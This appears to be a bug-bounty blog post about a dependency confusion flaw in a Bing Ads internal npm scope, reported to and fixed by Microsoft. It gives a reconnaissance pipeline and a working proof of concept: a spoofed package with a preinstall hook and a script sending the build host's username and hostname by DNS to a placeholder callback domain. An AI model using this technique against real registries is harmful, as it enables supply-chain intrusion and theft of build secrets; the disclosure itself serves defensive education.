Most hunters scan GitHub for leaked keys. I decided to reverse-engineer the production network traffic instead. Here is the engineering story behind a Critical RCE.

Hello everyone, Aman Kumar (ak) here.

If you have been following cybersecurity news, you might have heard the term "Supply Chain Attack." It sounds complex, but the concept is actually terrifyingly simple:

Instead of breaking into a house by smashing the window, you just hide inside a package that the owner ordered from Amazon. The owner brings the package inside, opens it, and boom, you are in.

In the software world, this means hacking the libraries and dependencies that developers trust, rather than hacking their code directly.

Recently, I found a Critical Vulnerability in Microsoft's infrastructure using this exact method. It wasn't a code error. It was a configuration oversight that allowed me to execute arbitrary code inside their internal build agents.

The Impact? I could have stolen source code, dumped API keys, or injected malware into Bing Ads that would affect millions of users.

But the story isn't just about the bug. It's about the engineering struggle to find it. I didn't find this by guessing. I found it by building a custom data pipeline to analyze the "nervous system" of Microsoft's web applications.

The Result? A confirmed RCE, a swift fix from MSRC, and a nice bounty payout.

Here is the full technical breakdown.

Disclaimer: The vulnerabilities discussed in this article were reported to the Microsoft Security Response Center (MSRC) under the Coordinated Vulnerability Disclosure (CVD) program. All issues have been remediated, and I have been authorized to disclose these findings.

1. The Theory: What is Dependency Confusion?

Before we hack, we must understand the target: NPM (Node Package Manager) and how it makes decisions.

When a developer writes code for a modern web app (like React or Angular), they don't write everything from scratch. They use libraries. To install these libraries, they run npm install.

Large enterprises like Microsoft typically use a hybrid approach with two types of registries:

  1. Public Registry: registry.npmjs.org (For open source libraries like React, Lodash, etc.).
  2. Private Registry: Internal servers (Azure Artifacts) for proprietary Microsoft code that shouldn't be public.

The Resolution Algorithm (The Flaw)

NPM is designed to be "helpful." It aggregates these sources. If a package name exists in both the internal registry and the public registry, it has to decide which one to download.

By default, many configurations prioritize the Higher Version Number.

Imagine you are a bouncer at a VIP club (Microsoft). You have a Guest List.

Internal List: Says "John Doe, Rank 1".

Public List: Says "John Doe, Rank 99".

The bouncer sees "Rank 99," assumes it is the VIP, and lets the Public John Doe in.

The Attack:

  • Internal Microsoft Server: Hosts auth-lib version 1.0.0.
  • Public Internet (Me): I upload auth-lib version 99.9.9.

The build server sees 99.9.9, assumes it is the latest patch, and downloads my code instead of Microsoft's code. Boom. I am running on their server.
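
To make that decision logic concrete, here is a minimal Node.js sketch (Node 18+, for the global fetch) of the "highest version wins" behavior. The internal registry URL is hypothetical and the semver comparison is deliberately naive; this illustrates the flaw, it is not npm's actual resolution code.

const INTERNAL_REGISTRY = 'https://pkgs.internal.example.com/npm'; // hypothetical
const PUBLIC_REGISTRY = 'https://registry.npmjs.org';

// Naive comparison: treat versions as numeric major.minor.patch triples.
function newer(a, b) {
  const [a1, a2, a3] = a.split('.').map(Number);
  const [b1, b2, b3] = b.split('.').map(Number);
  return a1 - b1 || a2 - b2 || a3 - b3;
}

// Ask a registry for the latest published version of a package.
async function latest(registry, name) {
  const res = await fetch(`${registry}/${name.replace('/', '%2f')}`);
  if (!res.ok) return null; // not hosted on this registry
  const meta = await res.json();
  return meta['dist-tags'] ? meta['dist-tags'].latest : null;
}

// The flaw: aggregate both sources and blindly prefer the higher version.
async function resolve(name) {
  const internal = await latest(INTERNAL_REGISTRY, name);
  const pub = await latest(PUBLIC_REGISTRY, name);
  if (internal && pub) return newer(pub, internal) > 0 ? 'PUBLIC wins' : 'internal wins';
  return internal ? 'internal wins' : 'PUBLIC wins';
}

resolve('auth-lib').then(console.log); // "PUBLIC wins" once 99.9.9 is live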

2. The Methodology: Source Maps are Treasure Maps

Most hunters fail because they look for dependencies in static files. They scan GitHub repos looking for package.json files. That is the old way. Everyone does that. The low-hanging fruit is gone.

I hypothesized that the most valuable internal packages are the ones used in Production, and that those would only be visible at runtime.

But there is a problem. Modern apps (like Bing Ads) are Single Page Applications (SPAs). They load code dynamically. If you curl the homepage, you just get an empty <div id="root"></div>.

The Leak: JavaScript Source Maps

When developers bundle their JavaScript (using Webpack or Vite), they often generate Source Maps (.js.map files). These files are debugging instructions. They tell the browser: "This ugly minified variable a actually corresponds to the function UserAuth inside node_modules/@internal/auth/index.js."

This is the leak. If I could read the Source Maps, I could see the exact file paths of every internal package Microsoft uses to build the application.
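
To see what that leak looks like in practice, here is a tiny Node.js sketch that dumps the package paths recorded in a .js.map file. The node_modules/@ filter is my own heuristic for surfacing scoped packages:

const fs = require('fs');

// A source map is plain JSON; its "sources" array lists the original file paths.
const map = JSON.parse(fs.readFileSync(process.argv[2], 'utf8'));

// Scoped packages show up as node_modules/@scope/name/... entries.
const scoped = (map.sources || []).filter((s) => s.includes('node_modules/@'));

console.log([...new Set(scoped)].join('\n'));

Run it as node listmap.js bundle.js.map and the internal scopes fall right out.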

3. The Struggle: Building "DepConf Hunter"

Finding a vulnerability is one thing; building the engine to find it consistently is another. When I started this hunt, I realized I couldn't check 27,000 domains manually.

Phase 1: The "Curl" Failure

My first attempt used curl and grep. I quickly realized this was useless because of the SPA architecture I mentioned above. The dependencies weren't in the HTML; they were in the JavaScript bundles loaded after the page rendered. Lesson: Static analysis is dead. You need a browser.

Phase 2: The "Headless" Architecture

I spun up a custom tool using Playwright (a headless browser automation framework). It wasn't enough to just visit each page; I needed to capture the network traffic. The tool visited 27,000 Microsoft subdomains and captured HAR (HTTP Archive) files.

A HAR file is a JSON log of everything the browser did: every XHR request, every WebSocket frame, and, crucially, every Source Map. After 78 hours of scanning, I had a "Data Lake" of 10,000+ HAR files.
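
Here is a condensed sketch of that harvester, assuming a domains.txt wordlist (a name I am inventing for illustration). It leans on Playwright's built-in recordHar option; the real tool also needed concurrency, retries, and tuned timeouts:

const { chromium } = require('playwright');
const fs = require('fs');

(async () => {
  const domains = fs.readFileSync('domains.txt', 'utf8').split('\n').filter(Boolean);
  fs.mkdirSync('./har_data', { recursive: true });
  const browser = await chromium.launch();

  for (const domain of domains) {
    // recordHar captures every request/response pair, including .js.map fetches.
    const context = await browser.newContext({
      recordHar: { path: `./har_data/${domain}.har` },
    });
    const page = await context.newPage();
    try {
      // networkidle waits for the SPA to finish pulling in its bundles.
      await page.goto(`https://${domain}`, { waitUntil: 'networkidle', timeout: 30000 });
    } catch (e) {
      // Dead or slow hosts are expected at this scale; just move on.
    }
    await context.close(); // closing the context flushes the HAR to disk
  }

  await browser.close();
})();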

[Screenshot: a directory listing of thousands of .har files, including ads.microsoft.com.har, bingads.microsoft.com.har, and teams.microsoft.com.har]
The result of the automated harvester: Thousands of HAR files generated from Microsoft subdomains, ready for analysis.

Phase 3: Parsing the Noise (The Headache)

Parsing 10,000 JSON files manually is impossible. I wrote a parser to extract specific strings from the JavaScript source maps found inside the HAR files. I was looking for the pattern @scope/package-name.

The Noise Problem: My initial regex was too broad. It flagged 54,084 "vulnerabilities." Huh? No way. It was flagging everything:

  • CSS Media Queries: @media screen...
  • Angular Decorators: @Component...
  • Email Addresses: support@microsoft.com

It was impossible to find the signal. I had built a noise generator, not a vulnerability scanner -_-
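
For the curious, the first pass looked roughly like this. The regex is a reconstruction, not my exact one, but it reproduces the problem faithfully: anything starting with @ gets swept up.

const fs = require('fs');
const path = require('path');

// Too greedy: this also matches @media, @Component, and the tail end of
// email addresses like support@microsoft.com.
const pattern = /@[A-Za-z][\w.-]*(?:\/[\w.-]+)?/g;

const hits = new Set();
for (const file of fs.readdirSync('./har_data')) {
  if (!file.endsWith('.har')) continue;
  const text = fs.readFileSync(path.join('./har_data', file), 'utf8');
  for (const match of text.match(pattern) || []) hits.add(match);
}

console.log(`${hits.size} candidates`); // ~54,000, almost all of it noise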

Phase 4: The Filter (Shannon Entropy)

I needed to distinguish "Human" package names from "Machine" garbage. I used Shannon Entropy (Math time!).

In information theory, entropy measures the randomness of data.

  • High Entropy: a8f92b1c3d4e5 (Random, machine generated). -> Delete.
  • Low Entropy: bingads-webui (Structured, human made). -> Keep.

This math trick reduced my list from 54,000 junk strings to 20 high-value targets.
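
The core of that filter fits in a few lines of Node.js. The two sample strings below are the article's own examples; the 3.5 cutoff is illustrative, and a real pipeline would pair entropy with other checks (npm naming rules, string length) rather than trusting it alone.

// Shannon entropy over a string's characters: H = -sum(p(c) * log2(p(c))).
function shannonEntropy(str) {
  const freq = {};
  for (const ch of str) freq[ch] = (freq[ch] || 0) + 1;
  let h = 0;
  for (const count of Object.values(freq)) {
    const p = count / str.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Random hex maximizes character diversity; human names repeat letters.
for (const s of ['a8f92b1c3d4e5', 'bingads-webui']) {
  const h = shannonEntropy(s);
  console.log(`${s}: ${h.toFixed(2)} -> ${h < 3.5 ? 'keep' : 'delete'}`);
}
// a8f92b1c3d4e5: 3.70 -> delete
// bingads-webui: 3.39 -> keep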

4. The Discovery: The "Bing" Signal

One string stood out from the noise. It appeared inside a Source Map loaded by bingads.microsoft.com.

The package name was: @bingads-webui-clientcenter/instrumentation

[Animation: a source map explorer highlighting the internal package @bingads-webui-clientcenter nested inside the production bundle]
Visualizing the "Shadow Dependency" inside the Source Map Explorer.

Why this was the "Chosen One":

  1. The Scope: @bingads-webui-clientcenter is incredibly specific. It points to a particular internal team at Bing, not a generic name like @microsoft/utils.
  2. The Usage: It wasn't on a test server. It was being loaded by 40+ Production Domains, including:
  • ads.microsoft.com
  • secure.bingads.microsoft.com
  • bingads.microsoft.com

This was a core telemetry package. If this was missing from the public registry, I had a way in.

The Filter Command:

grep -li "bingads-webui-clientcenter" ./har_data/*.har

The Result (The "Holy Grail" List): The terminal exploded with hits. This wasn't an isolated dev artifact. It was everywhere.

./har_data/ads.microsoft.com.har
./har_data/bingads.microsoft.com.har
./har_data/secure.bingads.microsoft.com.har
./har_data/www.ads.microsoft.com.har
... (40+ domains)
[Screenshot: grep output listing .har file paths, including ads.microsoft.com.har and bingads.microsoft.com.har, showing the internal package in network logs across multiple Microsoft domains]
The grep output showing the internal package @bingads-webui-clientcenter appearing across 40+ production domains.

Deep Dive with Ripgrep: I wanted to see exactly how it was being loaded. I used rg (ripgrep) to extract the context from the minified JavaScript bundles.

rg -a -o ".{0,100}@bingads-webui-clientcenter.{0,100}" ./har_data | head -n 69

The Output:

require(['@bingads-webui-clientcenter/instrumentation', 'PageContext'])
require.config({bundles:{"performance-metrics-logger":["@bingads-webui-clientcenter/instrumentation"]}})

What this told me:

  • It is a Core Dependency: It is being loaded alongside PageContext and performance-metrics-logger. This means it is critical for telemetry.
  • It is in Production: These HAR files came from secure.bingads.microsoft.com, which is the main advertiser portal.

This confirmed that claiming this package would let me execute code on the build servers responsible for deploying the main Bing Ads application.

[Screenshot: ripgrep output showing JavaScript snippets where require(['@bingads-webui-clientcenter/instrumentation']) is called, proving the package is loaded programmatically by the application]
Deep dive with Ripgrep confirming the package is loaded as a core dependency in the JavaScript bundle.

5. Verification: The "Open Namespace"

Finding the name is step one. Verifying it is "Claimable" is step two.

I navigated to the public NPM registry to check availability.

Check 1: The Package

https://www.npmjs.com/package/@bingads-webui-clientcenter/instrumentation

Result: 404 Not Found. (A good start.)

Check 2: The Organization (Critical)

This is where most people stop, but it is the most important part. In NPM, the part before the slash (@bingads-webui-clientcenter) is the Scope, or Organization. If Microsoft owned the organization, I could not publish packages under it.

I checked https://www.npmjs.com/org/bingads-webui-clientcenter.

Result: 404 Not Found.

Seriously? Microsoft developers were using this custom scope internally, but they forgot to register it on the public NPM registry. The namespace was effectively "Open" to the world. Anyone could walk in and take it.
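
The same check is easy to script (again Node 18+ for the global fetch). The registry answers 404 for names nobody owns; note that because Microsoft has since registered the scope, running this today no longer returns a 404:

const name = '@bingads-webui-clientcenter/instrumentation';

// Scoped names are queried with the slash percent-encoded.
fetch(`https://registry.npmjs.org/${name.replace('/', '%2f')}`).then((res) => {
  console.log(
    res.status === 404
      ? 'Unclaimed: anyone can publish this name'
      : `Taken (HTTP ${res.status})`
  );
});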

6. The Exploit: 2 Files, 1 Critical Bug

Now the scary part. I needed to prove I could execute code to confirm the vulnerability, but I absolutely could not break the build.

I created a directory on my laptop. Inside, I created just two files.

File 1: package.json (The Configuration)

This file does three things:

  1. Sets the name to match the internal package.
  2. Sets the version to 99.9.9 (to trick the server).
  3. Defines a preinstall hook. This script runs automatically during npm install, before the install completes.

{
  "name": "@bingads-webui-clientcenter/instrumentation",
  "version": "99.9.9",
  "description": "Security Research - Dependency Confusion PoC",
  "main": "index.js",
  "scripts": {
    "preinstall": "node index.js"
  }
}

File 2: index.js (The Payload)

I avoided HTTP requests because corporate firewalls usually block unexpected outbound HTTP traffic to prevent reverse shells. However, almost no firewall blocks DNS (UDP port 53).

I wrote a payload to exfiltrate the server's identity via a DNS subdomain.

const dns = require('dns');
const os = require('os');

// 1. Get the Victim's Identity
const user = os.userInfo().username;
const host = os.hostname();

// 2. Encode it into a domain
const payload = `bingads.${user}.${host}.[MY_INTERACTSH_DOMAIN]`;

// 3. Send the Signal (Fire and Forget)
try {
    dns.lookup(payload, (err) => { 
        // We don't care about the result, just the query.
        // This confirms execution without leaving a trace.
    });
} catch (e) { }

The Trap is Set: I ran one command: npm publish --access public

[Screenshot: successful execution of npm publish --access public, confirming that @bingads-webui-clientcenter/instrumentation version 99.9.9 was uploaded to the public registry]
Success: the proof-of-concept package is published to the public NPM registry as version 99.9.9.

7. The Execution: Boom.

I started my listener (interactsh-client) and waited. Dependency Confusion is a waiting game. You have to wait for an internal developer or a CI/CD bot to trigger a build.

45 Minutes Later… My terminal flashed. Boom.

[Screenshot: the Interactsh client displaying incoming DNS interactions from IP addresses such as 15x.7x.xxx.xxx and 10x.5x.xxx.x, verifying that the payload was executed by Microsoft's servers]
Critical RCE confirmed, DNS callbacks received from Microsoft's internal Azure infrastructure.

The Data:

  • Hostname: DESKTOP-9RU5G9J
  • User: Justin (Likely a Microsoft Engineer or Build Agent).
  • IP: 20.65.x.x (Confirmed: Microsoft Azure Cloud).
  • Second Hit: 159.75.x.x (Azure Cloud Build Agent).

What does this mean? It means Microsoft's internal build server reached out to the public internet, saw my "Newer" version, downloaded it, and executed my code with the privileges of the build user. I had achieved Remote Code Execution (RCE) inside the production build environment.

The "Glitch in the Matrix" (A Funny Coincidence)

Here is a story you won't believe. Look at the telemetry data above. The user running the build agent was named Justin.

When I reported this to MSRC, the Security Case Manager who handled my ticket… was also named Justin.

For a second, I thought I had hacked the exact machine of the guy trying to triage my report. I thought I was in a simulation. Justin (from MSRC) clearly noticed this too. In his final email to me, he added this legendary P.S.:

"Justin (confirmed not the same Justin from the data in your report)"

MSRC confirming that there are, in fact, two Justins.

8. Impact Analysis: What Could Have Happened?

If I were a malicious actor, the game would be over. Access to the build server is often worse than access to the production database.

  • Source Code Theft: I could have zipped the entire Bing Ads repository and uploaded it to my server.
  • Secret Dumping: Build environments are full of secrets. I could have run env to dump API Keys, Signing Certificates, and Cloud Credentials.
  • Lateral Movement: From the build agent, I could pivot to other internal Microsoft networks.
  • Supply Chain Poisoning: This is the nightmare scenario. I could have modified the legitimate code of the instrumentation package to include a JavaScript keylogger. This malicious code would then be compiled into the real bingads.microsoft.com website and served to millions of users.

9. Remediation & MSRC Experience

I immediately unpublished the package. (Rule #1 of Ethical Hacking: Do no harm).

I sent the full report to MSRC (Microsoft Security Response Center).

The Timeline:

  • Nov 26: Reported to MSRC.
  • Nov 26: Triaged (21 minutes later).
  • Dec 09: Fixed (Microsoft registered the scope).
  • Dec 17: $$$$ Bounty Awarded.
Official confirmation from the Microsoft Bounty Team.

The Classification Debate: Here is where it gets interesting for hunters. Although I demonstrated Remote Code Execution (RCE) via DNS callbacks, MSRC classified this vulnerability as:

  • Severity: Important (Not Critical).
  • Impact: Spoofing (Not RCE).

Why? MSRC often categorizes Dependency Confusion as "Spoofing" because you are technically "spoofing" an internal library to trick the build agent. While the result is code execution, the root cause is identity spoofing. Also, since this was an internal build agent (not a customer-facing production server), the severity was downgraded.

My Take: Is it RCE? Yes. Did I get paid for uploading two files? Yes. I won't disclose the exact amount, but let's just say it was a very profitable 6–7 hours of work. Cash is cash. -_-

Conclusion: The Future of Build Security

This finding reinforces a truth that many in our industry ignore: Security is not just about Code; it's about Configuration.

As we move toward more complex CI/CD pipelines, the "Supply Chain" becomes the new perimeter. Source maps, often treated as harmless debug files, are actually blueprints of your internal architecture. If you are a developer, disable them in production. If you are a hunter, stop ignoring them.
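
For the developers in the room, here is what "disable them in production" can look like. A minimal sketch assuming webpack 5; hidden-source-map keeps the maps for your internal error tracker but strips the sourceMappingURL comment that browsers (and hunters) use to find them:

// webpack.config.js
module.exports = {
  mode: 'production',

  // Emits .map files for internal use but omits the sourceMappingURL
  // comment from the bundle. Use devtool: false to emit no maps at all.
  devtool: 'hidden-source-map',
};

Either way, make sure the .map files never land in the public web root; "hidden" only means un-referenced, not un-downloadable.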

Building the automation to find this bug was a struggle. It required handling gigabytes of data, debugging headless browsers, and writing custom parsers. But in modern security research, Automation is the only way to scale.

Stop scanning GitHub. Start analyzing the traffic.

Want to hack more?

I am building LeetSec, a collective for the breakers and defenders. We don't post fluff; we post payloads.

  1. Follow the Publication so you don't miss the upcoming guide (and my custom script).
  2. Connect: LinkedIn | X (Twitter) | Instagram

(P.S. If this article helped you understand Supply Chain attacks better, drop a comment. I read them all -_- )